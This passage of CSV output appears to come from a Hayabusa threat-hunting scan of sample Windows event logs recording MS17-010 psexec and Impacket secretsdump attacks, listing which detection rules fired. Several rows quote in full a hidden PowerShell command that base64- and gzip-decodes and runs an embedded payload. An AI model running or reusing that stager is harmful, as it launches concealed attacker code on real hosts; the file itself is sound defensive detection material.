ecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7f0 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.633 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.633 +00:00,fs03vuln.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.633 +00:00,fs03vuln.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.633 +00:00,fs03vuln.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.633 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.758 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.758 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:06.539 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:06.554 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:19.198 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:19.198 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:19.198 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:19.213 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:19.291 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:22.992 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:22.994 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.009 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.009 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.009 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.025 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.025 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.042 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.044 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.044 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.060 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.171 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 09:00:09.959 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:10.026 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:10.026 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:11.118 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:11.118 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:13.226 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:13.226 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:13.226 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:13.226 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:13.258 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0xb32cb | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:14.421 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:14.437 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:14.437 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:14.735 